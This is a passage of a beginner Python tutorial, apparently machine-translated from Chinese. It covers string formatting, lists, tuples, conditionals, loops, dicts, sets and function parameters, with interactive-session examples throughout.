...... within the string in order with the passed arguments, although this is much more cumbersome to write than %:.
>>> 'Hello, {0}, 成绩提升了 {1:.1f}%'.format('小明', 17.125)
'Hello, 小明, 成绩提升了 17.1%'
f-string
The last way to format strings is to use strings starting with f
, called f-string
, which differs from normal strings in that strings that contain {xxx}
are replaced with the corresponding variable:
>>> r = 2.5
>>> s = 3.14 * r ** 2
>>> print(f'The area of a circle with radius {r} is {s:.2f}')
The area of a circle with radius 2.5 is 19.62
In the above code, {r}
is replaced by the value of the variable r
, {s:.2f}
is replaced by the value of the variable s
, and the .2f
after :
specifies the formatting parameter (i.e., two decimal places are retained), so the result of the replacement of {s:.2f}
is 19.62
.
Summary
Python 3's strings use Unicode, which directly supports multiple languages.
When str
and bytes
are converted to each other, the encoding needs to be specified. The most common encoding is UTF-8
, and Python certainly supports other encodings, such as encoding Unicode to GB2312
.
>>> '中文'.encode('gb2312')
b'\xd6\xd0\xce\xc4'
However, this approach is purely self-defeating. If you have no special business requirements, please keep in mind to use only UTF-8
encoding.
Formatting strings can be tested easily and quickly with Python's interactive environment.
Reference source code
Using lists and tuples
lists
One of Python's built-in data types is a list, an ordered collection of elements that can be added and removed at any time.
For example, listing the names of all the students in a class can be represented by a list.
>>> classmates = ['Michael', 'Bob', 'Tracy']
>>> classmates
['Michael', 'Bob', 'Tracy']
The variable classmates
is a list, and the number of elements in the list can be obtained using the len()
function.
>>> len(classmates)
3
Use the index to access the element at each position in the list, remembering that the index starts at 0
.
>>> classmates[0]
'Michael'
>>> classmates[1]
'Bob'
>>> classmates[2]
'Tracy'
>>> classmates[3]
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
IndexError: list index out of range
Python will report an IndexError
error when the index is out of range, so make sure the index doesn't go out of bounds, and remember that the index of the last element is len(classmates) - 1
.
To fetch the last element, in addition to calculating the index position, you can also use -1
for the index and fetch the last element directly at.
>>> classmates[-1]
'Tracy'
And so on, you can obtain the penultimate one, the penultimate one.
>>> classmates[-2]
'Bob'
>>> classmates[-3]
'Michael'
>>> classmates[-4]
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
IndexError: list index out of range
Of course, the penultimate one is out of bounds.
A list is a mutable ordered table, so it is possible to append elements to the end of a list.
>>> classmates.append('Adam')
>>> classmates
['Michael', 'Bob', 'Tracy', 'Adam']
It is also possible to insert an element into a specified position, such as the position with index number 1
.
>>> classmates.insert(1, 'Jack')
>>> classmates
['Michael', 'Jack', 'Bob', 'Tracy', 'Adam']
To delete the element at the end of a list, use the pop()
method.
>>> classmates.pop()
'Adam'
>>> classmates
['Michael', 'Jack', 'Bob', 'Tracy']
To delete the element at the specified position, use the pop(i)
method, where i
is the index position.
>>> classmates.pop(1)
'Jack'
>>> classmates
['Michael', 'Bob', 'Tracy']
To replace an element with another element, you can directly assign it to the corresponding index position.
>>> classmates[1] = 'Sarah'
>>> classmates
['Michael', 'Sarah', 'Tracy']
The data types of the elements inside the list can also be different, e.g.
>>> L = ['Apple', 123, True]
A list element can also be another list, e.g.
>>> s = ['python', 'java', ['asp', 'php'], 'scheme']
>>> len(s)
4
Note that s
has only 4 elements, where s[2]
is again a list, which is easier to understand if you split it up.
>>> p = ['asp', 'php']
>>> s = ['python', 'java', p, 'scheme']
To get 'php'
you can write p[1]
or s[2][1]
, so s
can be seen as a two-dimensional array, similarly there are three-dimensional and four-dimensional ...... arrays, but they are rarely used.
If a list contains not a single element, it is an empty list, which has length 0.
>>> L = []
>>> len(L)
0
tuple
Another kind of ordered list is called a tuple: tuples. tuples are very similar to lists, but tuples cannot be modified once they are initialized, for example, they also list the names of classmates.
>>> classmates = ('Michael', 'Bob', 'Tracy')
Now, the tuples classmates cannot be changed, and it has no methods like append(), insert(). You can use classmates[0]
, classmates[-1]
as normal, but you cannot assign to another element.
What is the point of immutable tuples? Because tuples are immutable, the code is safer. If possible, try to use a tuple instead of a list.
The tuple trap: When you define a tuple, the elements of the tuple must be identified at the time of definition, e.g.
>>> t = (1, 2)
>>> t
(1, 2)
To define an empty tuples, you can write ()
as follows:
>>> t = ()
>>> t
()
However, to define a tuples with only 1 element, if you define it like this.
>>> t = (1)
>>> t
1
It's not the tuple that is defined, it's the number 1
! This is because the parentheses ()
can represent both tuple and parentheses in a mathematical formula, which creates ambiguity, so Python specifies that in this case, the calculation is done by parentheses, and the result is naturally 1
.
Therefore, tuples with only 1 element must be defined with a comma ,
to disambiguate.
>>> t = (1,)
>>> t
(1,)
Python also adds a comma ,
when displaying tuples with only 1 element, so that you don't misinterpret them as parentheses in the mathematical sense.
Finally, look at a "mutable" tuples.
>>> t = ('a', 'b', ['A', 'B'])
>>> t[2][0] = 'X'
>>> t[2][1] = 'Y'
>>> t
('a', 'b', ['X', 'Y'])
This tuple is defined with 3 elements, 'a'
, 'b'
and a list. How come it changed later?
Don't worry, let's first look at the definition of the tuples contain three elements: a'',
b'' and a list.
When we modify the elements 'A'
and 'B'
of the list to 'X'
and 'Y'
, the tuples become:
On the surface, the elements of the tuples do change, but in fact, it is not the elements of the tuples that change, but the elements of the lists. tuples do not change the lists they point to in the beginning to other lists, so the so-called "unchanging" of tuples means that each element of the tuples points to the same list forever. The tuple's so-called "invariant" means that each element of the tuple points to the same element forever. That is, if you point to 'a'', you cannot change it to point to
'b'', and if you point to a list, you cannot change it to point to another object, but the list itself is mutable!
After understanding the "pointing to the same", how to create a tuple whose content also remains the same? Then we must ensure that each element of the tuple itself can not change.
Summary
lists and tuples are Python's built-in ordered collections, one mutable and one immutable. Choose to use them as needed.
Reference source code
Conditional Judgment
Conditional Judgment
The computer can do many automated tasks because it can make its own conditional judgments.
For example, entering the user's age and printing different things depending on the age is implemented in a Python program with the if
statement.
age = 20
if age >= 18:
print('your age is', age)
print('adult')
According to Python's indentation rules, if the if
statement is judged to be True
, the two lines of the indented print statement are executed, otherwise, nothing is done.
You can also add an else
statement to if
, meaning that if if
is judged to be False
, don't execute the if
content and go ahead and execute the else
.
age = 3
if age >= 18:
print('your age is', age)
print('adult')
else:
print('your age is', age)
print('teenager')
Be careful not to underwrite the colon :
.
Of course the above judgement is very rough, it is perfectly possible to make a more detailed judgement with elif
:
age = 3
if age >= 18:
print('adult')
elif age >= 6:
print('teenager')
else:
print('kid')
elif
is short for else if
, and it is perfectly possible to have more than one elif
, so the full form of the if
statement is:
if <条件判断1>:
<执行1>
elif <条件判断2>:
<执行2>
elif <条件判断3>:
<执行3>
else:
<执行4>
The execution of the if
statement has a feature that it judges from top to bottom. If True
is made on a certain judgment, after executing the statement corresponding to that judgment, the remaining elif
and else
are ignored. So, please test and explain why the following program prints teenager
.
age = 20
if age >= 6:
print('teenager')
elif age >= 18:
print('adult')
else:
print('kid')
The if
judgment condition can also be abbreviated, for example by writing.
if x:
print('True')
As long as x
is a non-zero value, a non-empty string, a non-empty list, etc., it is judged to be True
, otherwise it is False
.
Reconsider input
Finally, let's look at a problematic conditional judgment. Many students will use input()
to read the user's input, so that they can enter it themselves and the program runs more interestingly: input()
.
birth = input('birth: ')
if birth < 2000:
print('00前')
else:
print('00后')
Entering 1982
resulted in the following error.
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: unorderable types: str() > int()
This is because the data type returned by input()
is str
, which cannot be compared directly with an integer and must first be converted from str
to an integer. Python provides the int()
function to do this.
s = input('birth: ')
birth = int(s)
if birth < 2000:
print('00前')
else:
print('00后')
Run it again and you will get the correct result. But what if you type abc
? Again, you will get an error message.
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
ValueError: invalid literal for int() with base 10: 'abc'
It turns out that the int()
function reports an error when it finds a string that is not a legal number, and the program exits.
How do you check for and catch program runtime errors? We'll talk about errors and debugging later.
Summary
Conditional judgments allow the computer to make its own choices, Python's if... .elif... ...else is very flexible.
Conditional judgments match from the top down, executing the corresponding block when the condition is met, and subsequent elifs and else's are no longer executed.
Reference source code
Loop
Loop
To calculate 1+2+3, we can simply write the expression.
>>> 1 + 2 + 3
6
To calculate 1+2+3+... +10, you can barely write it.
However, to calculate 1+2+3+... +10,000, it's impossible to write the expression directly.
In order for the computer to compute thousands of iterations, we need loop statements.
Python has two kinds of loops, a for... .in loops that iterate through each element of a list or tuple in turn, see the example.
names = ['Michael', 'Bob', 'Tracy']
for name in names:
print(name)
Executing this code will print each element of names
in turn.
Michael
Bob
Tracy
So the for x in ...
loop is a statement that substitutes each element into the variable x
and then executes the indented block.
Another example is if we want to calculate the sum of integers from 1 to 10, we can use a sum
variable to do the accumulation.
sum = 0
for x in [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]:
sum = sum + x
print(sum)
If you want to calculate the sum of integers from 1 to 100, it is a bit difficult to write from 1 to 100. Fortunately, Python provides a range()
function that can generate a sequence of integers, which can be converted to a list by the list()
function. for example, the sequence generated by range(5)
is a sequence of integers less than 5 starting from 0.
>>> list(range(5))
[0, 1, 2, 3, 4]
range(101)
will generate a sequence of integers from 0-100, calculated as follows.
# -*- coding: utf-8 -*-
sum = 0
for x in range(101):
sum = sum + x
print(sum)
Please run the above code yourself to see if the result is the 5050 that Gauss students mentally calculated back then.
The second type of loop is the while loop, which keeps looping as long as the conditions are met, and exits the loop when the conditions are not met. For example, if we want to calculate the sum of all odd numbers within 100, we can use a while loop to do the following.
sum = 0
n = 99
while n > 0:
sum = sum + n
n = n - 2
print(sum)
Inside the loop, the variable n
keeps decreasing itself until it becomes -1
, when the while condition is no longer met and the loop exits.
break
In a loop, the break
statement can exit the loop early. For example, to have looped to print the numbers 1 to 100.
n = 1
while n <= 100:
print(n)
n = n + 1
print('END')
The code above prints out 1 to 100.
To end the loop early, you can use the break
statement.
n = 1
while n <= 100:
if n > 10: # When n = 11, the condition is met and the break statement is executed
break # The break statement will end the current loop
print(n)
n = n + 1
print('END')
As you can see from the above code, after printing out 1~10, END
is printed immediately afterwards and the program ends.
It can be seen that the function of break
is to end the loop early.
continue
During the loop, you can also skip the current loop and start the next one directly with the continue
statement.
n = 0
while n < 10:
n = n + 1
print(n)
The above program prints 1 to 10. However, if we want to print only odd numbers, we can skip certain loops with the continue
statement.
n = 0
while n < 10:
n = n + 1
if n % 2 == 0: # If n is an even number, execute the continue statement
continue # The continue statement will continue directly to the next loop, and the subsequent print() statement will not be executed
print(n)
Executing the above code, you can see that it no longer prints 1 to 10, but 1, 3, 5, 7, and 9.
You can see that the purpose of continue
is to end the current loop early and start the next one directly.
Summary
Loops are an effective way to get the computer to do repetitive tasks.
The break
statement can exit the loop directly during the loop, while the continue
statement can end the current round of loops early and start the next round directly. Both of these statements usually must be used in conjunction with the if
statement.
Be especially careful not to abuse the break
and continue
statements. break
and continue
can cause the code execution logic to bifurcate too much and be prone to errors. Most loops do not require the use of break
and continue
statements, and both of the above examples can be done by rewriting the loop condition or modifying the loop logic to remove the break
and continue
statements.
In some cases, if the code is written in a problematic way, the program will fall into a "dead loop", that is, a loop that goes on forever. In this case, you can use Ctrl+C
to exit the program or force the Python process to end.
Please try to write a dead loop program.
Reference source code
Using dict and set
dict
Python has built-in support for dictionaries: dict, also known as dictionary or map in other languages, uses key-value storage and is extremely fast to find.
For example, suppose you want to find the corresponding grades based on the names of your classmates, and if you implement it with lists, you need two lists.
names = ['Michael', 'Bob', 'Tracy']
scores = [95, 75, 85]
Given a name, to find the corresponding score, you have to find the corresponding position in names and then take out the corresponding score from scores, the longer the list, the longer it takes.
If we use a dict, we only need a "name" - "score" comparison table, and we can find the scores according to the names directly, no matter how big the table is, the search speed will not be slow. Write a dict in Python as follows.
>>> d = {'Michael': 95, 'Bob': 75, 'Tracy': 85}
>>> d['Michael']
95
Why is dict lookup so fast? Because the principle of dict implementation is the same as looking up a dictionary. Suppose the dictionary contains 10,000 Chinese characters, and we want to look up a certain word, one way is to turn the dictionary backward from the first page until we find the word we want, this method is the method of finding elements in the list, the larger the list is, the slower the search is.
The second way is to look up the page number corresponding to the word in the index table of the dictionary (e.g., the part number table), and then turn directly to that page and find the word. No matter which word you are looking for, this search is very fast and does not slow down as the size of the dictionary increases.
Given a name, such as 'Michael'
, dict can internally calculate the "page number" of Michael
, which is the memory address where the number 95
is stored, and take it out directly, so it is very fast.
As you can guess, this key-value storage method, when you put it in, you must calculate the storage location of the value according to the key, so that when you take it, you can get the value directly according to the key.
The method of putting data into dict, in addition to the initialization specified, can also be put in by key.
>>> d['Adam'] = 67
>>> d['Adam']
67
Since a key can only correspond to a value, putting a value to a key multiple times will flush out the previous value.
>>> d['Jack'] = 90
>>> d['Jack']
90
>>> d['Jack'] = 88
>>> d['Jack']
88
If the key does not exist, dict will report an error.
>>> d['Thomas']
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
KeyError: 'Thomas'
To avoid the error that the key does not exist, there are two ways, one is to determine whether the key exists by in
.
>>> 'Thomas' in d
False
The second is through the get()
method provided by dict, which can return None
if the key does not exist, or the value specified by itself.
>>> d.get('Thomas')
>>> d.get('Thomas', -1)
-1
Note: Python's interactive environment does not show the result when None
is returned.
To delete a key, use the pop(key)
method, and the corresponding value will also be deleted from the dict.
>>> d.pop('Bob')
75
>>> d
{'Michael': 95, 'Tracy': 85}
Be sure to note that the order of storage inside a dict has no relation to the order in which the keys are placed.
Compared with list, dict has the following features.
- the speed of lookup and insertion is extremely fast and does not slow down with the increase of keys.
- it takes up a lot of memory and wastes a lot of memory.
On the contrary, list has the following features.
- the search and insertion time increases with the increase of elements.
- takes up little space and wastes little memory.
So, dict is a way to trade space for time.
dict can be used in many places where high-speed lookup is needed, and it is almost ubiquitous in Python code. It is very important to use dict correctly, and the first thing to keep in mind is that the key of dict must be immutable object.
This is because dict calculates the storage location of value based on key, and if each time the same key is calculated the result is different, then the dict is completely confused internally. This algorithm for calculating the location by key is called a hash algorithm (Hash).
To ensure the correctness of the hash, the object that is the key cannot change. In Python, strings, integers, etc. are immutable and can therefore be safely used as keys, whereas lists are mutable and cannot be used as keys.
>>> key = [1, 2, 3]
>>> d[key] = 'a list'
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: unhashable type: 'list'
set
A set is similar to a dict in that it is also a set of keys, but does not store values. since keys cannot be duplicated, there are no duplicate keys in a set.
To create a set, a list is provided as the input set.
>>> s = set([1, 2, 3])
>>> s
{1, 2, 3}
Note that the passed parameter [1, 2, 3]
is a list, and the displayed {1, 2, 3}
just tells you that there are 3 elements inside this set, 1, 2, 3, and the displayed order does not indicate that the set is ordered.
Duplicate elements are automatically filtered in the set.
>>> s = set([1, 1, 2, 2, 3, 3])
>>> s
{1, 2, 3}
Elements can be added to the set by the add(key)
method, which can be repeated, but will not have the effect of.
>>> s.add(4)
>>> s
{1, 2, 3, 4}
>>> s.add(4)
>>> s
{1, 2, 3, 4}
Elements can be removed by the remove(key)
method.
>>> s.remove(4)
>>> s
{1, 2, 3}
set can be seen as a mathematically unordered and non-repetitive set of elements, so that two sets can be intersected, merged, etc. in the mathematical sense.
>>> s1 = set([1, 2, 3])
>>> s2 = set([2, 3, 4])
>>> s1 & s2
{2, 3}
>>> s1 | s2
{1, 2, 3, 4}
The only difference between set and dict is that there is no corresponding value stored, but the principle of set is the same as dict, so it is also not possible to put mutable objects into it, because there is no way to determine whether two mutable objects are equal, and there is no guarantee that there will be "no duplicate elements" inside the set. Try putting a list into set and see if you get an error.
Re-discuss immutable objects
As we said above, str is an immutable object, while list is a mutable object.
For mutable objects, such as list, the contents of list will change if list is manipulated, for example.
>>> a = ['c', 'b', 'a']
>>> a.sort()
>>> a
['a', 'b', 'c']
And for immutable objects, such as str, what about operations on str.
>>> a = 'abc'
>>> a.replace('a', 'A')
'Abc'
>>> a
'abc'
Although the string has a replace()
method, and it does turn out to be 'Abc'
, the variable a
still ends up being 'abc'
, so how should we understand it?
Let's change the code to the following.
>>> a = 'abc'
>>> b = a.replace('a', 'A')
>>> b
'Abc'
>>> a
'abc'
The thing to always keep in mind is that a
is the variable, and 'abc'
is the string object! There are times when we often say that the content of the object a
is 'abc'
, but what we really mean is that a
itself is a variable, and it is the content of the object it points to that is 'abc'
.
┌───┐ ┌───────┐
│ a │─────────────────>│ 'abc' │
└───┘ └───────┘
When we call a.replace('a', 'A')
, the call to method replace
actually acts on the string object 'abc'
, and the method, despite its name replace
, does not change the content of the string 'abc'
. Instead, the replace
method creates a new string 'Abc'
and returns it, and if we use the variable b
to point to that new string, it is easy to understand that the variable a
still points to the original string 'abc'
, but the variable b
points to the new string 'Abc'
.
┌───┐ ┌───────┐
│ a │─────────────────>│ 'abc' │
└───┘ └───────┘
┌───┐ ┌───────┐
│ b │─────────────────>│ 'Abc' │
└───┘ └───────┘
So, for immutable objects, calling any method on the object itself will not change the content of the object itself. Instead, these methods create new objects and return them, thus ensuring that the immutable object itself is always immutable.
Summary
Using a key-value storage structure for dict is very useful in Python. It is important to choose immutable objects as keys, and the most common key is a string.
While tuple is an immutable object, try putting (1, 2, 3)
and (1, [2, 3])
into a dict or set and interpret the results.
Reference source code
Python Programming Quick Guide - Functions
https://www.liaoxuefeng.com/wiki/1016959663602400/1017063413904832
https://docs.python.org/3/tutorial/index.html
Function
We know that the formula for calculating the area of a circle is
S = πr^2
When we know the value of radius r
, we can calculate the area according to the formula. Suppose we need to calculate the area of 3 circles of different sizes.
r1 = 12.34
r2 = 9.08
r3 = 73.1
s1 = 3.14 * r1 * r1
s2 = 3.14 * r2 * r2
s3 = 3.14 * r3 * r3
When there is a regular repetition of the code, you need to beware that writing 3.14 * x * x
each time is not only troublesome, but, if you want to change 3.14
to 3.14159265359
, you have to replace it all.
With functions, instead of writing s = 3.14 * x * x
every time, we write the more meaningful function call s = area_of_circle(x)
, and the function area_of_circle
itself only needs to be written once, so it can be called multiple times.
Basically all high-level languages support functions, and Python is no exception. not only can Python be very flexible in defining functions, but it has many useful functions built in itself that can be called directly.
Abstraction
Abstraction is a very common concept in mathematics. As an example.
Calculating the sum of a series, e.g., 1 + 2 + 3 + ... + 100
, is very inconvenient to write, so mathematicians invented the summation symbol ∑, which can be written as 1 + 2 + 3 + ... + 100
is written as.
This abstract notation is very powerful because we see that ∑ can be understood as a summation, rather than reducing to a low-level addition operation.
Moreover, this abstract notation is scalable, e.g.
Reduced to addition it becomes.
(1 x 1 + 1) + (2 x 2 + 1) + (3 x 3 + 1) + ... + (100 x 100 + 1)
As you can see, abstraction allows us to think directly at a higher level, without caring about the underlying concrete computational process.
Writing computer programs is the same, and functions are one of the most basic ways of abstracting code.
Calling functions
Python has a lot of useful functions built in that we can call directly.
To call a function, you need to know the name of the function and its arguments, for example, the function abs
that finds the absolute value has only one argument. The documentation can be viewed directly from Python's official website at
http://docs.python.org/3/library/functions.html#abs
You can also view the help information for the abs
function at the interactive command line via help(abs)
.
To invoke the abs
function.
>>> abs(100)
100
>>> abs(-20)
20
>>> abs(12.34)
12.34
Calling a function with the wrong number of arguments passed in will report a TypeError
error, and Python will tell you explicitly that abs()
has and only has 1 argument, but gives two.
>>> abs(1, 2)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: abs() takes exactly one argument (2 given)
If the number of arguments passed in is correct, but the argument type is not accepted by the function, a TypeError
error is also reported and the error message is given: str
is the wrong argument type.
>>> abs('a')
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: bad operand type for abs(): 'str'
And the max
function max()
can take any number of arguments and return the largest one.
>>> max(1, 2)
2
>>> max(2, 3, 1, -5)
3
Data type conversions
Python's built-in common functions also include data type conversion functions, such as the int()
function that converts other data types to integers:
>>> int('123')
123
>>> int(12.34)
12
>>> float('12.34')
12.34
>>> str(1.23)
'1.23'
>>> str(100)
'100'
>>> bool(1)
True
>>> bool('')
False
A function name is actually a reference to a function object, and it is possible to assign the function name to a variable, which is equivalent to giving the function an "alias".
>>> a = abs # Variable a points to the abs function
>>> a(-1) # So you can also call the abs function from a
1
Define function
In Python, to define a function you use the def
statement, write the function name, the parentheses, the arguments in the parentheses, and the colon :
in that order, then, write the function body in an indented block, and the return value of the function is returned with the return
statement.
Let's take a custom my_abs
function for absolute values as an example.
# -*- coding: utf-8 -*-
def my_abs(x):
if x >= 0:
return x
else:
return -x
print(my_abs(-99))
Please test it yourself and call my_abs
to see if the returned result is correct.
Note that when the statements inside the function body are executed, once they reach return
, the function is executed and the result is returned. Thus, very complex logic can be implemented inside functions through conditional judgments and loops.
If there is no return
statement, the function will also return the result when it finishes executing, but the result will be None
. return None
can be abbreviated to return
.
When defining functions in the Python interactive environment, note that Python will show a ...
prompt. When you finish defining the function you need to press enter twice to get back to the >>>
prompt.
┌────────────────────────────────────────────────────────┐
│Command Prompt - python - □ x │
├────────────────────────────────────────────────────────┤
│>>> def my_abs(x): │
│... if x >= 0: │
│... return x │
│... else: │
│... return -x │
│... │
│>>> my_abs(-9) │
│9 │
│>>> _ │
│ │
│ │
└────────────────────────────────────────────────────────┘
If you have already saved the function definition of my_abs()
as an abstest.py
file, then you can start the Python interpreter in the current directory of that file and import the my_abs()
function with from abstest import my_abs
, noting that abstest
is the file name (without the . py
extension).
┌────────────────────────────────────────────────────────┐
│Command Prompt - python - □ x │
├────────────────────────────────────────────────────────┤
│>>> from abstest import my_abs │
│>>> my_abs(-9) │
│9 │
│>>> _ │
│ │
│ │
│ │
│ │
│ │
│ │
│ │
└────────────────────────────────────────────────────────┘
The usage of import
is described in detail in the subsequent section Modules.
Empty functions
If you want to define an empty function that doesn't do anything, you can use the pass
statement.
def nop():
pass
The pass
statement doesn't do anything, so what's the point? Actually pass
can be used as a placeholder, for example, if you haven't figured out how to write the code for a function yet, you can put a pass
first so that the code can run.
pass
can also be used in other statements, such as.
if age >= 18:
pass
Missing pass
, the code will run with syntax errors.
Parameter checking
When calling a function with the wrong number of arguments, the Python interpreter will automatically check for it and throw TypeError
:
>>> my_abs(1, 2)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: my_abs() takes 1 positional argument but 2 were given
But if the argument type is wrong, the Python interpreter can't check it for us. Try the difference between my_abs
and the built-in function abs
.
>>> my_abs('A')
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<stdin>", line 2, in my_abs
TypeError: unorderable types: str() >= int()
>>> abs('A')
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: bad operand type for abs(): 'str'
The built-in function abs
checks for parameter errors when improper parameters are passed in, while the my_abs
we defined has no parameter checking and will cause an error in the if
statement with a different error message than abs
. So, this function definition is not good enough.
Let's modify the definition of my_abs
to do an argument type check and allow only arguments of integer and floating point types. The data type check can be implemented with the built-in function isinstance()
.
def my_abs(x):
if not isinstance(x, (int, float)):
raise TypeError('bad operand type')
if x >= 0:
return x
else:
return -x
With the addition of parameter checking, the function can throw an error if the wrong type of parameter is passed in.
>>> my_abs('A')
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<stdin>", line 3, in my_abs
TypeError: bad operand type
Error and exception handling will be covered later.
Returning multiple values
Can a function return more than one value? The answer is yes.
For example, in a game where you often need to move from one point to another, given the coordinates, displacement and angle, you can calculate the new coordinates as follows.
import math
def move(x, y, step, angle=0):
nx = x + step * math.cos(angle)
ny = y - step * math.sin(angle)
return nx, ny
The import math
statement indicates that the math
package is imported and allows subsequent code to reference the sin
, cos
and other functions in the math
package.
Then, we can get both the return values.
>>> x, y = move(100, 100, 60, math.pi / 6)
>>> print(x, y)
151.96152422706632 70.0
But in fact this is only an illusion, and the Python function still returns a single value:
>>> r = move(100, 100, 60, math.pi / 6)
>>> print(r)
(151.96152422706632, 70.0)
The original return value is a tuple! However, in syntax, returning a tuple can omit the parentheses, and multiple variables can receive a tuple at the same time, assigned to the corresponding value by position, so Python's function returns multiple values is actually returning a tuple, but it's easier to write.
Summary
When defining a function, you need to determine the function name and the number of arguments.
If necessary, you can first check the data types of the arguments.
return
can be used inside the function body to return the result of the function at any time.
If the function is executed and there is no return
statement, it automatically returns None
.
The function can return multiple values at the same time, but it is actually a tuple.
Reference source code
Parameters of a function
When defining a function, we name and locate the parameters and the interface definition of the function is complete. For the caller of the function, it's enough to know how to pass the right arguments and what value the function will return; the complex logic inside the function is encapsulated and the caller doesn't need to understand it.
Python's function definitions are very simple, but very flexible. In addition to the normal definition of mandatory arguments, you can also use default, variable, and keyword arguments, making the function definition an interface that not only handles complex arguments, but also simplifies the caller's code.
positional parameters
Let's start by writing a function that calculates x2:
def power(x):
return x * x
For the power(x)
function, the argument x
is a position parameter.
When we call the power
function, we must pass in one and only one parameter x
.
>>> power(5)
25
>>> power(15)
225
Now, what if we want to calculate x3? We can define another power3
function, but what if we want to calculate x4, x5 ......? We can't define an infinite number of functions.
It may have occurred to you that you can modify power(x)
to power(x, n)
to compute xn, and to do so, say.
def power(x, n):
s = 1
while n > 0:
n = n - 1
s = s * x
return s
For this modified power(x, n)
function, any nth power can be computed as follows.
>>> power(5, 2)
25
>>> power(5, 3)
125
The modified power(x, n)
function has two parameters: x
and n
, both of which are positional parameters. When the function is called, the two values passed in are assigned to the parameters x
and n
in order of position.
Default parameters
The new power(x, n)
function definition is fine, however, the old calling code fails because we added an argument, causing the old code to fail to call properly because of a missing argument: the
>>> power(5)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: power() missing 1 required positional argument: 'n'
Python's error message is clear: the call to the function power()
is missing a positional argument n
.
This is where the default parameter comes into play. Since we often calculate x2, it is perfectly acceptable to set the default value of the second argument, n, to 2.
def power(x, n=2):
s = 1
while n > 0:
n = n - 1
s = s * x
return s
Thus, when we call power(5)
, it is equivalent to calling power(5, 2)
.
>>> power(5)
25
>>> power(5, 2)
25
For other cases where n > 2
, n must be passed explicitly, such as power(5, 3)
.
As you can see from the above example, default parameters can simplify function calls. When setting default parameters, there are a few things to keep in mind.
One is that the mandatory parameters come first and the default parameters come second, otherwise Python's interpreter will report an error (think about why the default parameters can't be placed in front of the mandatory parameters).
Second, how to set the default parameters.
When a function has more than one parameter, put the parameters that change a lot in front and the parameters that change a little in the back. The parameter with small changes can then be used as the default parameter.
What are the benefits of using default parameters? The biggest benefit is that it reduces the difficulty of calling the function.
For example, let's write a function to register a first grade student and pass in two parameters name
and gender
.
def enroll(name, gender):
print('name:', name)
print('gender:', gender)
In this way, the enroll()
function is called with only two parameters passed in.
>>> enroll('Sarah', 'F')
name: Sarah
gender: F
What if I want to continue passing in information such as age, city, etc.? This would make calling the function much more complicated.
We can set age and city as default parameters.
def enroll(name, gender, age=6, city='Beijing'):
print('name:', name)
print('gender:', gender)
print('age:', age)
print('city:', city)
In this way, most students are not required to provide their age and city when registering, but only the two required parameters.
>>> enroll('Sarah', 'F')
name: Sarah
gender: F
age: 6
city: Beijing
Only students who do not match the default parameters will be required to provide additional information.
enroll('Bob', 'M', 7)
enroll('Adam', 'M', city='Tianjin')
As you can see, the default arguments reduce the difficulty of function calls, and once more complex calls are needed, more arguments can be passed to achieve them. Whether it is a simple call or a complex call, the function only needs to define one.
When there are multiple default parameters, the call can either provide the default parameters in order, such as calling enroll('Bob', 'M', 7)
, meaning that, in addition to the two parameters name
, gender
, the last 1 parameter is applied to the parameter age
, and the city
parameter, since it is not provided, still uses the default value.
It is also possible to provide partial default parameters out of order. When providing partial default parameters out of order, you need to put the parameter name on. For example, calling enroll('Adam', 'M', city='Tianjin')
means that the city
parameter uses the value passed in and the other default parameters continue to use the default values.
Default parameters are useful, but they can fall into a hole if not used properly. The default parameters have one of the biggest pits, as demonstrated below.
First define a function, pass in a list, add an END
and then return.
def add_end(L=[]):
L.append('END')
return L
When you call it normally, the result seems good:
>>> add_end([1, 2, 3])
[1, 2, 3, 'END']
>>> add_end(['x', 'y', 'z'])
['x', 'y', 'z', 'END']
When you call with the default parameters, the result is also correct at first:
>>> add_end()
['END']
However, when add_end()
is called again, the result is not correct:
>>> add_end()
['END', 'END']
>>> add_end()
['END', 'END', 'END']
Many beginners are puzzled by the fact that the default argument is []
, but the function seems to "remember" the list after adding 'END'
each time.
The reason for this is as follows.
When a Python function is defined, the value of the default parameter L
is calculated, i.e. []
, because the default parameter L
is also a variable that points to the object []
, and each time the function is called, if the content of L
is changed, the content of the default parameter will change the next time it is called, and will no longer be the []
of the function when it is defined.
One thing to keep in mind when defining default parameters: they must point to invariant objects!
To modify the above example, we can use the invariant object None
to implement.
def add_end(L=None):
if L is None:
L = []
L.append('END')
return L
Now, no matter how many times it is called, there will be no problem:
>>> add_end()
['END']
>>> add_end()
['END']
Why do we design invariant objects like str
and None
? Because once the invariant object is created, the data inside the object cannot be modified, which reduces the errors caused by modifying the data. In addition, because the object is invariant, there is no need to add locks to read the object simultaneously in a multitasking environment, and there is no problem reading it simultaneously at all. When we write a program, if we can design an invariant object, then try to design it as invariant object.
Variable arguments
Variable parameters can also be defined in Python functions. As the name implies, a variable parameter is a variable number of arguments passed in, from 1, 2 to any number, and 0.
Let's take a math problem as an example, given a set of numbers a, b, c ......, calculate a^2 + b^2 + c^2 + .......
To define this function, we must determine the input parameters. Since the number of parameters is uncertain, we first think that we can pass a, b, c ...... as a list or a tuple, so that the function can be defined as follows.
def calc(numbers):
sum = 0
for n in numbers:
sum = sum + n * n
return sum
But to call it, a list or tuple needs to be assembled first:
>>> calc([1, 2, 3])
14
>>> calc((1, 3, 5, 7))
84
If variable parameters are utilized, the way the function is called can be simplified as follows.
>>> calc(1, 2, 3)
14
>>> calc(1, 3, 5, 7)
84
So, we change the parameters of the function to variable parameters.
def calc(*numbers):
sum = 0
for n in numbers:
sum = sum + n * n
return sum
Defining a variable parameter is simply a matter of adding a *
sign in front of the parameter compared to defining a list or tuple parameter. Inside the function, the argument numbers
is received as a tuple, so the function code remains exactly the same. However, the function can be called with any number of arguments, including 0 arguments.
>>> calc(1, 2)
5
>>> calc()
0
What if I already have a list or tuple and want to call a mutable parameter? This can be done.
>>> nums = [1, 2, 3]
